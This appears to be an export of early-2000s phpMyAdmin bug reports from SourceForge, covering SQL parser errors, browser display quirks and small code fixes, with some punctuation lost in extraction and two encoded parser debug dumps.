Example error; Error SQL query SHOW TABLE STATUS LIKE administrators MySQL said You have an error in your SQL syntax near r at line 1 This query generated the following mysql.log data; 1618 Query SHOW TABLES LIKE administrators 1618 Query SHOW TABLE STATUS LIKE administrators r As you see, a little r at the end of the SHOW TABLE STATUS query.
Is this a misconfiguration or a bug in phpMyAdmin?
I had the same problem with phpMyAdmin 2.3.0 rc3 only there it added after the queries, with 2.3.0 final it seems kinda random what it puts there).
Though, the strange thing is that this only happens on this server, I ve got several other servers running the same versions of everything not complaining at all.
The server is running Linux, and I m using Apache and PHP 4.2.3.
Original URL https sourceforge.net p phpmyadmin bugs 584 https sourceforge.net p phpmyadmin bugs 584 Original author dufuz Found in version 2.3.0","bug"
"24444","6954","2.3.0) Highlight parser bug Duplicate).
I m running PHP Version 4.2.2 on Apache 2.0 and MySQL 4.0.2 alpha on Windows 98se system.
I found an bug in highlight parser.
There are not some spaces between unsigned and zerofill and default types.
Original URL https sourceforge.net p phpmyadmin bugs 586 https sourceforge.net p phpmyadmin bugs 586 Original author stetina Found in version 2.3.0","bug"
"24444","6955","2.3.0 rc4) Failed to process SQL command.
You seem to have found a bug in the SQL parser.
Please submit a bug report with the data chunk below BEGIN CUT JElkOiBzcWxwYXJzZXIubGliLnBocCx2IDEuMTUgMjAw Mi8wNy8yNiAxODozMDo1OSBsZW05IEV4 cCAkPGJyIC8 CldoeSBkaWQgd2UgZ2V0IGhlcmU IDc3 OCA3NzkgNDk0MzxiciAvPgpMZWZ0b3Zl cjog6TxiciAvPgpBOiA3NzggNzc5PGJyIC8 ClNRTDogU0 VMRUNUICogRlJPTSBibG9ncyBXSEVS RSB0aXRsZSBOT1QgSU4gKCdZZXQgQW5vdGhlciBEY W1uIEJsb2cnLCAnSWxsdXNpb25haXJlJ3Mg TXVzaW5ncycsICdwc3ljaG9kZWxpYyBwaXBwaScsICdC cm9rdW4tTWluZHonLCAnS25vd2xlZGdl IERpc2NvdmVyeSBSb29tJywgJ0dpcmwgb24gYSBCdXM nLCAnQSBsaXR0bGUgYml0IGJhZCwgYnV0 IGEgd2hvbGUgbG90IGZ1bm55JywgJ015IFRob3VnaHRzJ ywgJ1dpc2RvbSBGUk9NIGEgUHlyb3Bo b2JpYyBEcmFnb24nLCAnaW5mZWN0ZWQnLCAnYW5 kIGluIG90aGVyIG5ld3MnLCAnSXJ2aW5nIFBs YWNlJywgJ1RoZSBPcmJpdGFsIERlYXRoIFBsYXRmb3J tJywgJ2luZGlnb2hhdC5jb20nLCAnV2lu aydzIFdpbGQgV29ybGQnLCAnbWFuaWNzZWJhc3RpY W4nLCAnay10LWgteC1iLVlFJywgJy4uLiB0 cmlja3kgcHVwIC4uLicsICdSYW1ibGluZ3MnLCAnV2ViIF ZvaWNlJywgJ0hlZGdldG9hZC5jb20n LCAndmVyb25pY2EgcGFsYWNlJywgJ1BhY2FycmFzIF VwZGF0ZXMnLCAnT3JieSBPbmxpbmUnLCAn TXkgQnV6enonLCAnQmVpbmcgS2F0aWUnLCAnV290Z XZlcicsICdkbyB5b3UgcmVhbGx5IHRoaW5r IGl0cyBhIG1vbnN0ZXI JywgJ1Bvb2RsZWNpcmN1cycsIC dUaGUgTW9zdCBDdXJyZW50IG9mIEN1 cnJlbnQgQWZmYWlycycsICdMZXQncyB0cnkgdGhpcyB hZ2Fpbi4uLicsICdpIGxpa2UgaXQgc21v b3RoLi4uJywgJ3dlYmxvZyBnb29kbmVzcycsICdZVUNLLi csICduZXdzYW5jZScsICdTb3VsIEds b3cnLCAnR3JhcGhpY kgTGlmZScsICdjYXRjaCBhIGZhb GxlbiBhbmdlbCcsICdTJ2FsbCBHb29k IFJlY29yZHMnLCAnRGFtbml0LCBXaGF0IE5vdz8nLCAn QSBTcXVhcmUgUGVnJywgJ0Rpc09yZ2Fu aXphdGlvbicsICdQYW5kb3JhJ3MgQm94ZXJzJywgJ1dvb mRlcmZ1bCBXb3JsZCBvZiBEZW5pcycs ICdLeWxlIFN0aWxsIEZyZWUgUHJlc3MnLCAnOjogRSB NIFAgUiBFIFMgUyA6OicsICdkZWZ5IHRo ZSByZWRzJywgJ0VwZXVzJyBlcGlnb25lJywgJ05hcmNvb GVwc3kgb3IgTnltcGhvbWFuaWEnLCAn SmFuZVJvZUlzRGVhZCcsICdrZWtlJywgJ1doYXQncyBC bG9nZ2luZyBZb3U JywgJ1BheXBhbCBV c2VyczogQmV3YXJlIScsICd0aGUgbC5pLnMuYS4gcHJv amVjdCcsICdKb2FuJ3MgW0JVU1RFRF0g U3R1ZmYnLCAnRm9vdHN0ZXBzIGluIHRoZSBIYWxsJyw gJ0kuTy5VLiBvbmUgZ2FsYXh5JywgJ0Fs Z2Vybm9uJywgJ2VsZWN0cmljLWhlYWQuY29tJywgJ0d saXR0ZXItUGl4aWUubmV0JywgJ2Nob2xz dHJvLm5ldCcsICdEZWFkIFlldCBMaXZpbmcnLCAnVW5k ZWZpbmVkJywgJzw JywgJ0JsdWUgQmxv ZycsICdvcmFuZ2UgZ29kZGVzcycsICdJbnRlcm5hbCBNb 25vbG9ndWUuJywgJ0dJQU5UY29ja3Jv YWNoJywgJ0FxdWFyaXVzVGhlb3J5JywgJ1JhbnIgJiBEc mVhbXMgLS0gRWR1Y2F0aW9uJywgJ1Rl bm5lc3NlZUV4cHJlc3MnLCAnUXVlZXJ8VmlzaW9ucycsI Cd3YWxraW5nIHRoZSBwYXRoJywgJ0Jp Z1NreVZpZXcnLCAnR2lybDIgLSBMaWZlVXBkYXRlcycsI CdTcXVpZExpbmsnLCAnTG9yZW0gSXBz dW0nLCAnU21va2VzaWduYWxzJywgJ3NwaXQgd2hlbiB 5b3Ugc2luZycsICdGZW1hbGUgTmV0IEp1 bmtpZScsICdsZXVzY2hrZS5vcmcnLCAnbWljIGNlbnRyY WwnLCAnRGVjYWYgU2lsaWNvbicsICdG YWxsZW4gVGhvdWdodHMnLCAnVGhlIFVuYmVhcmFib GUgTGlnaHRuZXNzIG9mIEJ5cm9uaXVzJywg J1dlaXJkIFdpcmVkIFdvcmxkIExvZ3MnLCAnaWthc3Rpa2 9zJywgJ1ZhcnlpbmcgSXJyZWxldmFu Y2UnLCAnQ29ja2x1Y2snLCAnTm9zdWNoLm9yZyAtIE1 pc3Rha2VzIHdlcmUgbWFkZScsICdiaXRj aGNha2VzIScsICdwaWxwaSBqb3VybmFsJywgJ3Iwbi4g YW5kIGhpcyBzdHVmZi4nLCAncGF1bHN0 cm9uZy5vcmcnLCAnW2pvZWxhZ2VdJywgJ25ld3NyYW NrIGJsb2cnLCAnTWF0dCBDbGFzc2ljJywg J2Rvcmt5c3BpY2UnLCAnSnVzdCBhIExpdHRsZSBTb21l dGhpbmcnLCAnTWFyZ2FyZXQncyBNZW50 YWxpdHkgTWFwJywgJ3RvbWJpcm8uY29tJywgJ0RzdG 9ydGlvbi5jb20nLCAnbnV0ei4nLCAnaW5k aWdvYmxvZycsICdMYW1lIHRvIHRoZSBuLTEgZGVncmV lJywgJ1RoaXMgR2lybCdzIExpZmUnLCAn Q2xvc2VyIHRvIEZhcicsICdIdWIncyBMb2cnLCAnTGF6eS BQcm90ZWN0aW9uJywgJ1NpdmppJywg J0RpYXJ5IG9mIGEgR2xvYmFsIE5vbWFkJywgJ2Fic2Npc 3Npb24nLCAnQ2xvdWRzIGxpa2Ugc2hh ZG93cyBwYXNzLicsICdGYWN0cyBBcmUgTWVhbmluZ2 xlc3MnLCAnZG9iYmVybWFuaWEnLCAnTWV0 aWN1bG91c2x5IFVuZGVydGhvdWdodCcsICcuZC5zLnA uIC0gZGlzZ3J1bnRsZWQgc21hcnQgcGVv cGxlJywgJ01hc3Rlcl9vZl9QdXBwZXR6JywgJ1JhbmRvbU5 vdGVzJywgJ2hleSBtYW4sIHdobyBh dGUgbXkgcGl6emE JywgJ2Fyd2VuLm9yZycsICdmb3No ZGF3Zy5uZXQnLCAnVW5kZXIgdGhlIFN0 YXJzJywgJ1VOcHJldHR5JywgJ1RvZGRsaWtlJ3MgV29y dGhsZXNzIE11c2ljIFJldmlldyBCbG9o JywgJ0ZyZWVNeVBva2V5LkNvbScsICdCbGFjayBIb2xlIC hZb3UncmUgU3Vja2VkIEhBLEhhLGhh Li4uKScsICdMZXNzIHRoYW4gSm95JywgJ2luIHRoZSBh cmVuYScsICcuLndoaXJsV2luZC4uJywg J2thbnRvZ2lybGJsdWVzJywgJ1RPVkJMb2cnLCAnTXkg UHJpdmF0ZSBEb21haW4nLCAnTXVzZXMn LCAnTXkgcGllY2Ugb2YgcmVhbCBlc3RhdGUgb24gdGhlI G5ldCcsICdhIHN0b3JlIGRldm90ZWQg ZW50aXJlbHkgdG8gZ29vJywgJ09yaWdpbmFsIEdyZWVu IERlYXRoIEZsYXZvcicsICdKb3VybmV5 IEluc2lkZSBNeSBNaW5kJywgJ1N0YXJnYXplciBCbHVlJy wgJ2VwaXBoYW55JywgJ2ludCBtYWlu KCknLCAneFggUmViZWthaCdzIFdvcmxkIFh4JywgJ3Ro aW5rIG11c2ljJywgJ2ltcHJvcGVyLm9y ZycsICdTbGVldmUgTm90ZXMnLCAnRlJFU0hDSEFPUy5 jb20nLCAnUHV0IHRoZSBrbmlmZSBkb3du IGFuZCB0YWtlIGEgZ3JlZW4gaGVyYiwgZHVkZS4nLCAn V2hlcmUgaXMgbXkgbWluZD8nLCAnUm9z eSBQaW5rJywgJ0JpdHMgb2YgTWFkbmVzcycsICdCb3 Rhbnk1MDAwJywgJ1doZW4gR29vZCBMaXR0 bGUgR2lybHMgR28gQmFkLi4uJywgJ0JlY29taW5nJywgJ 0FjY291bnRzIG9mIGEgT25lIEdpcmwg QXJteScsICdBIEdpcmwgQW5kIEhlciBLZXlib2FyZDogSk YuQ09NJywgJ0dVVCBSVU1CTEVTJywg J2Jsb2cgeW91IScsICdXYWxraW5nIG9uIHN1bnNoaW5lJ ywgJ0Jyb2Fkd2F5U3RhcnMnLCAnQ2F0 ICYgTW91c2U6IFBvd2VycGxheSBUYWxlcycsICcqW21v ZGVybiBwZWFzYW50XSonLCAnZ29oIGZp Z3VyZSEnLCAnQ3luaWN3b3JsZC5jb20nLCAnUGxhaW4 gVGFsayBGUk9NIFRoZSBUZXhhcyBIaWxs IGNvdW50cnknLCAnQ2FwaXRhbCBJbmZsdXgnLCAna2F 0aC5sb2cnLCAnSGlwSG9wTGliZXJ0YXJp YW5pc20nLCAnSSByYW1ibGUuLi4uLi4nLCAnVGhlIEpv dXJuZXknLCAnbXkgUGF0Q0gnLCAnZGlj a2luc29uIHN5bmRyb21lJywgJ0JCQyBDb21tJywgJ1RoZS BSZWVsIElyaXNoIERhbmNlcicsICd1 bmxpa2VseSBwcmVzZW5jZSB IHRhbGVzIG9mIGEgb GlmZSB IHVuc2V0dGxlZCcsICd0ZXJtaW5h bGx5IHNjcmV3ZWQnLCAnQXNwaXJlIHRvIHRoZSBTdGF ycycsICdib3VuY2VncnJybCBoYXMgYSBi YWxsJywgJ0ZvciBNZSBUaGlzIElzIEhlYXZlbicsICdLcmlz dGVuJ3MgSmFwYW4nLCAnRm9yIEFs d2F5cycsICdMdWtlJ3MgQmxvZycsICdTZWNyZXQgUm9j a2V0IDEzJywgJ05ldXJvcHJvc3RoZXNp cyBOZXdzJywgJ3VucHJvZHVjdGl2aXR5JywgJ3NtZWxse WtpZCdzIGNvc20nLCAnU29tZVRIaU5H JywgJ1NVQ0tBVEFTSCcsICdIYXJkIFRpbWVzJywgJ1Jv Y2tldHdob3JlczogUG9wIEN1bHR1cmUg QXNzYXVsdCBTaXRlJywgJ2NlbGxvICYgZXZlcnl0aGluZy BlbHNlJywgJ2ZyaWVka2l0dGVuLmNv bSAtIGluc2FuaXR5IGluY2x1ZGVkLicsICdhbWF0ZXVyaX NoLm9yZycsICdzaG9zaG8ncyBjb3Ju ZXInLCAnT24gV29tZW4gYW5kIG90aGVyIGNyZWF0dXJl cycsICdTYWQgU2FsdmF0aW9uJywgJ3Nh bWFuZmlzJywgJ0V2ZXJ5dGhpbmcgRmFsbHMgQXBhcn QnLCAnam91cm5hbDogYXMvaGVyIHNreScs ICdMaWZlJ3MgQ3Jvc3NlcycsICdObyBGdW5lcmFsJywg J0JpbmdvYm93ZGVuJ3MgUmFudHMgJ24n IFN0dWZmJywgJ0x1bWlub3VzIERyZWFtcycsICdzb3Vy amF5bmUuY29tfG5ld3MnLCAnUmllbiBk J0ltcG9ydGFuY2UnLCAnTG9zdCBpbiBhIEJsb2cnLCAn QmxhemluZyBJbXBlcmZlY3Rpb24nLCAn QWxsIEFib3V0IHRoZSBTRVAnLCAnUnlhbiBFYW5lcyB PbmxpbmUnLCAnUnV0aGllJ3MgVG9wIFNl Y3JldCBEaWFyeScsICdBYSdzIEJsb2cnLCAnZ3JlZW5lZ 2dzIGFuZCBmdW5ueSBvbGQgbWVuJywg J3RocmliYmxlJywgJ0pvZSBTemlsYWd5aSBEb24ndCBE YW5jZScsICdNb3JwaGluZSBEcmVhbScs ICdodWxsbyBlZHdhcmQgcGVuaXMnLCAnT25saW5lIEV waXBoYW55JywgJ1BldCBSb2NrIFN0YXJz JywgJ2h1bGxvIGVkd2FyZCBwZW5pcycsICdJIGJsYWIgZ m9yIGZ1bicsICdUaGUgUG9yY2gnLCAn VHdpc3RlZFNvdWwnLCAnd3d3LnBsYXR0aXR1ZGVzLm NvbScsICdkemlnYXZlcnRvdiBpbiB0aGUg MjV0aCBjZW50dXJ5JywgJ3Jhd2JyaWNrLm5ldCBibG9nJ ywgJ1RoZSBfX2VhcnRoIEluYy4nLCAn UHJvc2lhbiBUaG91Z2h0cycsICdCZWRhenpsZScsICdCY WQgQ29tZWRvd24nLCAnQ2FzdWxvJywg J0xvdGhs83JpZW4nLCAnySBpc3NvIGHtLi4uJywgJ2FlZG ggd2lzaGVzIGZvciB0aGUgY2xvdGgg b2YgaGVhdmVuJywgJ0xhcnMgSC4gRmlzY2hlcidzIEJsb 2cnLCAnU hyZW4gRi4gcOUgTmV0dGV0 Li4uJywgJ015IFdlYmxvZycsICdtYWVyY2hlbmxhbmQub mV0JywgJ2RhbmllbCBmaWVuZXMgd2Vi bG9nJykgTElNSVQgMCwgMzA= END CUT Original URL https sourceforge.net p phpmyadmin bugs 585 https sourceforge.net p phpmyadmin bugs 585 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6956","2.3.0) back link.
I m running PHP Version 4.2.2 on Apache 2.0 and MySQL 4.0.2 alpha on Windows 98se system.
When I click on Back link in SQL query error, than I ve been redirected to empty SQL window.
Better choice will be redirection to the filled SQL window by the query with error or redirection to last page form, filled with current query and marked error parts.
Original URL https sourceforge.net p phpmyadmin bugs 587 https sourceforge.net p phpmyadmin bugs 587 Original author stetina Found in version 2.3.0","bug"
"24444","6957","2.3.1) browser cache problems under Apache 2.
I m running PHP Version 4.2.2 on Apache 2.0 and MySQL 4.0.2 alpha on Windows 98se system.
I have some problems with cached pages in browser IE 5.5 SP2 sometimes, Opera 6.04 often, Netscape 4.8 not detected cache problem, but not user friendly).
Can you add no cache headders and meta tags?
Original URL https sourceforge.net p phpmyadmin bugs 588 https sourceforge.net p phpmyadmin bugs 588 Original author stetina Found in version 2.3.1","bug"
"24444","6958","2.2.6) problems with the history buttons of IE.
what was going on 1| i drop all is ok that what i want 2| i insert my database new with database.sql ok but now ); all is ok no problems but if i use my browser to go back in history function PMA showMessage message) or something other stuff reloads parent frams and all from the function runs again i dont maybe reset the browser history.
Mozilla 4.0 compatible; MSIE 6.0; Windows NT 5.0) Gru Santex Original URL https sourceforge.net p phpmyadmin bugs 590 https sourceforge.net p phpmyadmin bugs 590 Original author santex Found in version 2.2.6","bug"
"24444","6959","doc error; Macs unstuff as unix txts.
in Documentation.html you say amp;quot;Warning for Mac users php seems not to like Mac end of lines character amp;quot;\r amp;quot;) and Stuffit unstuffs with Mac formats, of course.
So you ll have to resave as in Bbedit to unix style ALL phpMyAdmin scripts before uploading them to your server.
amp;quot; I agree PHP doesn t like mac line ending but I think you should edit this with some nod to OS X ..
I ve been using phpMyAdmin with it with 10.1 and now 10.2 and stuffit on OS X unstuffs as UNIX line endings so there is no need to go in a resave files.
Original URL https sourceforge.net p phpmyadmin bugs 589 https sourceforge.net p phpmyadmin bugs 589 Original author anonymous Found in version 2.3.0","bug"
"24444","6960","Syntax coloring and alias without AS.
Robin, This query select t1.id,t2.id from self join t1 left join self join t2 on t1.id=t2.parent id) where t1.status id=2; is displayed as SELECT t1.id, t2.id FROM self joint1 left join self joint2 on t1.id = t2.parent id ) where t1.status id = 2 LIMIT 0, 30 Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 591 https sourceforge.net p phpmyadmin bugs 591 Original author lem9","bug"
"24444","6961","2.3.0) Infinite refresh with Opera 6.04 awaiting reply).
Infinite refresh problem with Opera 6.04 Windows.
After login the page keeys refreshing reloading) for ever.
Original URL https sourceforge.net p phpmyadmin bugs 592 https sourceforge.net p phpmyadmin bugs 592 Original author vboctor Found in version 2.3.0","bug"
"24444","6962","Unable to browse any table.
Following is the error that I get when I attempt to browse the contents of any of my tables this db is hosted on sourceforge) Error SQL query SELECT 2A FROM 60phpWN note table 60 LIMIT 0, 30 MySQL said You have an error in your SQL syntax near 2A FROM 60phpWN note table 60 LIMIT 0, 30 at line 1 Original URL https sourceforge.net p phpmyadmin bugs 593 https sourceforge.net p phpmyadmin bugs 593 Original author vboctor","bug"
"24444","6963","2.3.0 rc4) You seem to have found a bug in the SQL.
Datenbank DB42275 auf rdbms.strato.de You seem to have found a bug in the SQL parser.
Please submit a bug report with the data chunk below BEGIN CUT eNqVnV1v20YWhu8L7H YiwK9Seqcc4YcTrofSNokLZIFsrW7AX qzUGw6EiRLXkpKd Nn98Y IxdL ym7QRPSchxcBYls84AwfzfseiqP3658uHoftv1fXs27bdt uFm vZ 5fP3gf5Fupgj56pCeP0onW QZrH9uhxlcOqvcrh2X uw9d ftuFk79 9Wb 33CxuAi teFduwvztmv FrRu n85WJOlvnvhq Zy t3nfdo Dzd1vnjz YV3vzj9x6vH4ZfXPzw5exau3v7rw2bdhtNnZ2H4 z3p21f7lm pRHV4v1tsH 4cl6u2vPl vZRbtaPwin5 PVx 22Xc3W85v1u7b7Jrz58dnPzw7HLi 4OR373p6 84nKo sWxw J sRLeb9bhaTfb95OwaNcjZVAdPdR50e66m Wy7We0H lq1XZjB ZUUtM8KXt10y93o2RkpFg F3rTd 2 Zy0V2NFoqkUHUo9OOmH9zYjFekRn07stl2t93d7MZHha57Oh T6YbE935y83r8dO6FE6uSw3fRk Lt61IxVyX8GvoZ zfVyHXHP1YVQCo06AUdGJQRiVwKgARiUwa hlGJTAqgFEJjOrDqARGLcGoDEZz V9bhReBkzAfSCJA2AUgjQBoE0tAoAZBGgLQykEaANACkESD NB9IIkFYC0hCQKTxfzbbn83Yd9uuL 8MNmOzIqcC5Jwj83PTafyh0XEVLFpToJqsOpTkTzE9T8RDQ A c1PRPNTWfMT0fwEND8RzU 5idB JBWoTkzzk4ZXbQ9QgUZy0X3RT0T00wTRT4pODNJIRD8B0U 9E9FNZ9BMR QREPxHRT77oJyL6qST6 iYl sru18Z7VlVwkX 4Tkfs0Qe4TkfsE5T4ZGiVAkch9Kst9InKfgNw nIvfJl tE5D6V5D5BuY93 C M9KJK5jT6KkaAYJ6AYCYoRohgJihGgGNF0lVGMBMUIUIwE xeijGAmKsYRiZChW4dlusWzHR0Nm pfJBrAiI1QQQKwJiBUGsCIgVALEiIFZlECs05QDEioBY SBWBM SqBGLFQKzDy274ebnplmMDIuOp fRbJTc9UT2CR3LhKNWSR3HRINWCxJizWZRZrwmINWKzRtfN ZrAmLdYnFGrHYfCLoYTj5dNGWN9ux 0TX OTUSZqvlZr5ZzWer4cQ 1TyuJqSci3kjqA7HvCH9eQP784 b05w3ozxvSnzfl rwh XkD vOG 9OeN3583pD9vSv15w rzRn H8nKgqAAlufZ m96QNr2Z0KY3ik4 MQkna9Aa06Q1p05tym96QNr0B bXpD2vTGb9Mb0qY3pTa9YW16Ds9vttu2O9wI XV2fflb2y0 tPt3R wWzf0JZ7qodHyzkaBfpLKgO RzqTdTbDdTaTdTaDdTaTdTaX19lM1tkM1tlM1tnsr7OZrLO5tM 5mts5mdUAml9xfXjNZXvOE5TUr OjHIIlleM1heM1lec3l5zWR5zWB5zWR5zf7ymsnymkvLa0bLqzwK p9ftYtsuZ10 ngfh4W522a5u P3Z6OWZwh2O c6vK58V vL0 r TGh7jw0tIHcz48FpSEDE vI4 UcxkfXkMKlRgf kxquIwPryGF PMaHl5A69zM BExrp xeEv4cTFy4dUnUgmROoFIRScGiVRCp AIilRCpZSKVEKmASCVEqk kEiK1 RCRcde0zIsfvJPSvAmdjPpFGiLQJRBoh0iCRhkYJiDRCpJWJN EKkASKNEGk kUaItBKR6COoXmlf tNvz aI7ao2IwvaHnx1gOT4YHe0yDOtwhoXovECdF6LzAnReiM5 LWeeF6LwAnRei8 LrvBCdl5LO C9P5 vKfzbbbsaGQi 1ruxBtlwnaLopODFJItF2AtgvRdilruxBtF6Dt QrRdfG0Xou1S0nZh2t6v GU bw5PNxxXIBfIFXYigywRBFyLoAgVdDI0SYEgEXcqCLkTQB Qi6EEEXX9CFCLqUBF2goMew3Fxd r4ZP8sNpuxs5FTK90acxEhrjBBojoTFCGiOhMQIaI5quMo2R0Bg BjZHQGH0aI6ExlmiMjMYqnM5W Hx4e7iu9vmwvLwcAunY ZhnJJFU lxXhsprAZUW4rCCXFeGyAlx WhMuqzGWFphxwWREuK5 LinBZ lbisGJd1vzZ27xft HDIaGqfxJqQWE8gsSYk1pDEmpBYAxJrQmJ dJrEmJNaAxBpdO5 EmpBYl0is GYk5nN6VGDkLVEKHXUyL1UXbhZNwer1o37Wrw4L7qt2fz vVdr nqX3lUHLDUt0ZODSFFvqgSZvv jVw6FVbMfd pwEr8nafCpgveOFDUEii5daDIz6lz80CR iq5faBo VRwA0HRHQQt3kJQ h4S QLS xXo9OjrEgQJI2XtHp0Cq7OQopIogVQKpIkjVgVQRpEogVQSpAk gVQapFSBVCauHJsHb2gF6Pjgpd MANwGoLTpsBpCE6jcBobK4HTEJzmwGkITiNwGoLTAJyG4LQ inAbhjOGnYc28F040yxHAGRGccQqc EcEZKZwRwRkJnJFNmwNnRHBGAmdEcEYAZ0RwxiKcEcJZst kKPcKY0T4uRkjq cHprjt8aDFfrH9r F9vtXeWReoIK u8bZrB1ii1mdkipLWYCpsQWs VGHVusyBYrsc WKbLECW6zIFmvRFmPkNTxdtefz Ap6IAGCIIehTDDE9OYonMsRKDLEiQ6yOIVZkiJUYYkWGWIEh VmSItWiIFRri so9u5otVgU80SUD lliRJdYplliRJVZqidXYWAmeyBKrY4kVWWIllliRJVZgiRVZYi1aY oWWuF8J7rcJaIaBHVZkh3WK HVZkh5XaYUV2WIkd1simzQET2WEldliRHVZghxXZYS3aYYV2 uNeVQpGK1LA bI4cbjb TsHDcLYY vuVlsMi7j PV8J nwx GXwxPmo3cRgZ49Cv0bd3jg4Uc7b6PTFA d i4y4o0NWmNjc S g4z4Yivb YiOu2IApNuKJzbfERhyxlQyxMT cq st1McFyMX2XbARE2wTPLA pOjFIIXFTBvyvEfWzsvs1Yn4N eF8j1td852vE FrJ9xqzvb0hfDq2QRfdEzXf6xpaUic4XUPvDuhzjY 0SQEhMrpU9rhGLa8DhGjG4 5vtbI bWSu7WmLm1Pz5o9mLWrRe7fTc2MDLJvs014nJtgsk14n ENWlwjDteAwbWIpqvMJHG3Bsyt EW9rvrU14mytZGyN dr vXqvxSRz4j9dZuTpMpvwdJmRp8sMPl 1m5OkyA0 XGXm6zMpPl1mFphxg SJ4uM pMiNPl1np6TJjT5fF8LRdrvpD9uujXd7Efver4d8 7j7cfQvs 97Pr47GQ1TD6TU8UVIfj HEnTE2HTE0nTE0HTE9msF3GOpOmJoOmJpOmJftMTSdMT S01PZE1PL6pnD0 7ZXXkYXIiotFveyJp e KEticqOjHIIWl7Imh7Iml7YrntiaTtiaDtiaTtiX7bE0nbE0ttT2RtTxx 22HT7y 3bwupKrpTf AUXSAcUJHVAkHVCEHVA0NErAIzHnsdwBReKsIuiAIumAot8B RdIBxVIHFFkH9AfDGl7eAbnd7j6e j3TmzL9W4fls3v8YTsKbxdX1yMcGYK59E0s87AQLSxwsNLDEv wL7Stxr2bwS7wqsK3GuvnElvrVk W5lrrcMv87EGHgyhlvCku3o7W1 sx0sIqeFySxKGZELCkJCEIYE JQ0IShgQkDAlJGJJywpCQhCEB CUNSs vvMkwShqSUMCQsYWjYT3P4oOgeEskF9 0qiReSCfF CQuKFBMYLCYkXEhAvJCReSMrxQkLi hQTECwmJFxI XkhIvJCU4oWExQsNG7He3L8kkkvkG1USKyQT YoWExAoJjBUSEiskIFZISKyQlGOF hMQKCYgVEhIrJH6skJBYISnFCgmLFSpuU2O71FJ4Ov58FRhB Gr5j5uqmP z4aCGHu28CkkIkE1KI hKQQCUwhEpJCJCCFSEgKkZRTiISkEAlIIRKSQiR CpEkhlCBY JZCJEnDz7OLRdv1Xdqhw q1XZzP 14efjmuS6 bBBJIJBMCiYQEEgkMJBISSCQgkEhIIJGUA4mEBB IJCCQSEkgkfiCRkEAiKQUSCQsk kmTh5b4vcdHtx 4cJHKRfKNAAolkQiCRkEAigYFEQgKJBAQSC QkkknIgkZBAIgGBREICicQPJBIS SCSlQCJhgUSSYni 2W1GzoDMqv8hPokikglRREKiiARGEQmJI hIQRSQkikjKUURCoogERBEJiSIS P4pISBSRlKKIhEURSROeLHeL25ugbbe7nl33on1czc bkMYFEs RsSMNxBAEJ0jAYG8Bi46PYABKb IogN4LDxMWwAhY0LYQMYbAoINojA Glz3uVs3g3f1T48vLxre7v YX7fuZndc2A8hkCzh9cs3x0cK OdQlmSQQyIQEAiEJBAITCIQkEAhIIBCSQCDlBAIhCQQCEgiEJ BCIn0AgJIFASgkEwhIIJOvhg6p1 T d6e73pdiMdfSaX3W99SAqBTEghEJJCIDCFQEgKgYAUAiEp BFJOIRCSQiAghUBICoH4KQRCUgik lEIgMIUgW3g1tiSSi9O3PKezfhpWHz6OnQBpdzLYFpLRvpA8ZW NIRjtDMt0aktHekEw2h2S0OyQ7 20My2h SyQaRjHaIZLBFJKM9Irm4SSTDXSK5b6N vFm a7t72E SXH6yxaLdInrJdJKP9IpluGMlo x0gmW0Yy2jOSnU0jGe0ayWTbSEb7RjLYOJLRzpFc3DqSjS65 Fs5m6 U9ZKKrZYBMtv7aFDLZ28Yo mXCshExDZJpDpiEyjZBpiEwDZBoi04pkGiQzhu83691ssW67h0V tR9MdAaURURqnUBoRpZFSGhGl kVAa2bQ5lEZEaSSURkRpBJRGRGksUhohpXU43aw2V7PhOyf Wo NCw6oBnjXCs56CZ43wrCmeNcKz JnjWCM awbNGeNYEz5pdR4BnjfCsi3jWEM90Zz1HSqCzSIDLhL hMU7hMiMtEuUyIy0S4TIjL5HCZ EJeJcJkQlwlwmRgRRS4T4zLe3j 9 WqI 26ikpkGso5UfYqoI02n ko4UnQg60nNHzpGaEzFHWg6k HCl5Ucihjpe EDCDEr0N2PcsDx9Tnc32A9Zfzoo7I54F8OUfS78v 0jyfbl3pd6X ZLE LuSrsv 656k 3J v5T3Mv5 VNLrXQ== END CUT Original URL https sourceforge.net p phpmyadmin bugs 594 https sourceforge.net p phpmyadmin bugs 594 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6964","MySQL Variables not working.
SERVER Win 2k Server, Win 2k Pro, Apache on Unix not sure what version) MySQL 3.23.x PHP 4.x Problem phpMyAdmin does not properly return User Variables.
For example, using the MySQL database, the following query should return an incrementing value mysql amp;gt; select if isnull i), i =1, i = i 1) as nid from user WHERE 1; | nid | | 1 | | 2 | | 3 | | 4 | | 5 | | 6 | 6 rows in set 0.00 sec) However, in phpMyAdmin it returns only 1 s nid 1 1 1 1 1 1 Regards, Chris Bloom Web Infrastructure Analyst cbloom lifespan.org Original URL https sourceforge.net p phpmyadmin bugs 595 https sourceforge.net p phpmyadmin bugs 595 Original author anonymous Found in version 2.2.5","bug"
"24444","6965","Default value for datetime field ignored.
When I saw the fix amp;quot;Edit was always filling the current time in datetime fields amp;quot; in version 2.3.1 rc1 I remembered an old bug ?).
The datetime fields never use default values.
If the default value for a datetime field is different from 0000 00 00 00 00 00 , then that value should be used instead of the current time when you add a new record insert mode).
BTW, can t the time and date fields have the same behavior as the datetime fields?
Original URL https sourceforge.net p phpmyadmin bugs 596 https sourceforge.net p phpmyadmin bugs 596 Original author bth","bug"
"24444","6966","2.3.1 rc1) Relation drop down amp; field with spaces.
The new drop down list showing possible values from a related table, doesn t work if the related field contains any spaces.
The spaces are converted to characters.
That is because urlencode ) is used instead of htmlspecialchars ).
Row 427 in tbl change.php, v. 1.108 echo amp;lt;option value= amp;quot; .
urlencode key) .
amp;quot; ; should be echo amp;lt;option value= amp;quot; .
htmlspecialchars key) .
amp;quot; ; Also in the code for the new drop down lists, the backup field is missing.
It should be inserted above row 423 in the same file.
Original URL https sourceforge.net p phpmyadmin bugs 597 https sourceforge.net p phpmyadmin bugs 597 Original author bth Found in version 2.3.1 rc1","bug"
"24444","6967","2.3.1 rc1) Full Texts not working.
The feature Full Texts dontlimitchars) on the Browse page doesn t work anymore.
The amp;lt; T amp;gt; button isn t toggled and the shortened texts are still shortened after clicking on the button.
Original URL https sourceforge.net p phpmyadmin bugs 598 https sourceforge.net p phpmyadmin bugs 598 Original author bth Found in version 2.3.1 rc1","bug"
"24444","6968","2.3.1 rc1) empty comment column.
